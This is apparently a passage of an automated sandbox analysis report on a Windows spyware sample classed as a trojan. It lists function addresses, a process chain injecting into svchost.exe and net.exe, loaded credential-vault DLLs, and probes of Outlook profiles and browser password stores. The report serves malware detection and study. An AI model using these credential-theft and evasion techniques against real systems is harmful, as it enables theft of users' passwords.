                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF75712_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C314602_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF43F2_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB5BF02_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7DBF92_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FB802_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFB762_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEDAC62_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDDAAC2_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C85AA02_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE1AA32_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFA492_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7A462_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB3A6C2_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C499502_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B9502_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD59102_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C438E02_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD8002_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD22_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C03FD52_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41F922_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFFB12_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFF092_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C49EB02_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FDC02_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43D402_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF1D5A2_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7D732_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFCF22_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB9C322_2_03CB9C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BA3524_2_034BA352
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034C03E64_2_034C03E6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0340E3F04_2_0340E3F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034A02744_2_034A0274
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034802C04_2_034802C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034881584_2_03488158
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033F01004_2_033F0100
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0349A1184_2_0349A118
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B81CC4_2_034B81CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034C01AA4_2_034C01AA
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B41A24_2_034B41A2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034920004_2_03492000
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034247504_2_03424750
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034007704_2_03400770
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033FC7C04_2_033FC7C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0341C6E04_2_0341C6E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034005354_2_03400535
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034C05914_2_034C0591
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B24464_2_034B2446
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034A44204_2_034A4420
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034AE4F64_2_034AE4F6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BAB404_2_034BAB40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B6BD74_2_034B6BD7
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033FEA804_2_033FEA80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034169624_2_03416962
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034029A04_2_034029A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034CA9A64_2_034CA9A6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0340A8404_2_0340A840
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034028404_2_03402840
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033E68B84_2_033E68B8
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0342E8F04_2_0342E8F0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03474F404_2_03474F40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03442F284_2_03442F28
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03420F304_2_03420F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034A2F304_2_034A2F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0340CFE04_2_0340CFE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0347EFA04_2_0347EFA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033F2FC84_2_033F2FC8
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03400E594_2_03400E59
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BEE264_2_034BEE26
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BEEDB4_2_034BEEDB
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03412E904_2_03412E90
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BCE934_2_034BCE93
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0340AD004_2_0340AD00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0349CD1F4_2_0349CD1F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033FADE04_2_033FADE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03418DBF4_2_03418DBF
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03400C004_2_03400C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033F0CF24_2_033F0CF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034A0CB54_2_034A0CB5
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B132D4_2_034B132D
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033ED34C4_2_033ED34C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0344739A4_2_0344739A
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0341B2C04_2_0341B2C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034A12ED4_2_034A12ED
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034052A04_2_034052A0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034CB16B4_2_034CB16B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0343516C4_2_0343516C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033EF1724_2_033EF172
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0340B1B04_2_0340B1B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034070C04_2_034070C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034AF0CC4_2_034AF0CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B70E94_2_034B70E9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BF0E04_2_034BF0E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BF7B04_2_034BF7B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034456304_2_03445630
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B16CC4_2_034B16CC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B75714_2_034B7571
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034C95C34_2_034C95C3
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0349D5B04_2_0349D5B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_033F14604_2_033F1460
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BF43F4_2_034BF43F
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BFB764_2_034BFB76
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03475BF04_2_03475BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0343DBF94_2_0343DBF9
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0341FB804_2_0341FB80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BFA494_2_034BFA49
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B7A464_2_034B7A46
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03473A6C4_2_03473A6C
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034ADAC64_2_034ADAC6
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03445AA04_2_03445AA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0349DAAC4_2_0349DAAC
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034A1AA34_2_034A1AA3
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034099504_2_03409950
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0341B9504_2_0341B950
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034959104_2_03495910
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0346D8004_2_0346D800
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034038E04_2_034038E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BFF094_2_034BFF09
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03401F924_2_03401F92
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BFFB14_2_034BFFB1
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03409EB04_2_03409EB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03403D404_2_03403D40
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B1D5A4_2_034B1D5A
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034B7D734_2_034B7D73
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0341FDC04_2_0341FDC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03479C324_2_03479C32
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034BFCF24_2_034BFCF2
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02971F804_2_02971F80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0296CEA04_2_0296CEA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0296D0C04_2_0296D0C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0296B1404_2_0296B140
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_029755E04_2_029755E0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0297381B4_2_0297381B
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_029738204_2_02973820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0298BC204_2_0298BC20
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0320E3044_2_0320E304
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_032152244_2_03215224
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0320E1E44_2_0320E1E4
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0320D7684_2_0320D768
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_0320E46C4_2_0320E46C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: String function: 00445975 appears 65 times
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: String function: 0041171A appears 37 times
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: String function: 0041718C appears 45 times
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: String function: 0040E6D0 appears 35 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 280 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03435130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0347F290 appears 105 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 033EB970 appears 280 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 03447E54 appears 111 times
                Source: C:\Windows\SysWOW64\net.exeCode function: String function: 0346EA12 appears 86 times
                Source: XhAQ0Rk63O.exe, 00000000.00000003.1423114263.0000000004813000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs XhAQ0Rk63O.exe
                Source: XhAQ0Rk63O.exe, 00000000.00000003.1422631324.00000000049BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs XhAQ0Rk63O.exe
                Source: XhAQ0Rk63O.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/10
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeFile created: C:\Users\user\AppData\Local\Temp\CitlaltpetlJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCommand line argument: Wu0_2_0040D7F0
                Source: XhAQ0Rk63O.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: net.exe, 00000004.00000003.1761624549.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.000000000301F000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1763767098.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1761497982.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002FF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: XhAQ0Rk63O.exeReversingLabs: Detection: 75%
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeFile read: C:\Users\user\Desktop\XhAQ0Rk63O.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\XhAQ0Rk63O.exe "C:\Users\user\Desktop\XhAQ0Rk63O.exe"
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\XhAQ0Rk63O.exe"
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\XhAQ0Rk63O.exe"Jump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: XhAQ0Rk63O.exeStatic file information: File size 1330101 > 1048576
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.1542553129.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542599146.000000000363B000.00000004.00000020.00020000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000003.1652356035.0000000000B00000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IislGDEHlLEZDm.exe, 00000003.00000002.3863687071.000000000018E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: XhAQ0Rk63O.exe, 00000000.00000003.1419274394.0000000004890000.00000004.00001000.00020000.00000000.sdmp, XhAQ0Rk63O.exe, 00000000.00000003.1423114263.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1452027710.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453866402.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.000000000355E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.1574242672.000000000306C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1581774696.0000000003212000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: XhAQ0Rk63O.exe, 00000000.00000003.1419274394.0000000004890000.00000004.00001000.00020000.00000000.sdmp, XhAQ0Rk63O.exe, 00000000.00000003.1423114263.00000000046F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1452027710.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453866402.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1574658216.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000002.3871197453.000000000355E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871197453.00000000033C0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.1574242672.000000000306C000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.1581774696.0000000003212000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.000000000437C000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1869973892.00000000038FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.000000000437C000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3866320365.0000000002F71000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000039EC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1869973892.00000000038FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.1542553129.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1542599146.000000000363B000.00000004.00000020.00020000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000003.1652356035.0000000000B00000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
                Source: XhAQ0Rk63O.exeStatic PE information: real checksum: 0xa2135 should be: 0x152f43
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401ACE push eax; iretd 2_2_00401B68
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004061DF push FFFFFF9Bh; retf 2_2_004061E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA1D push edi; retf 2_2_0040AA23
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401B40 push eax; iretd 2_2_00401B68
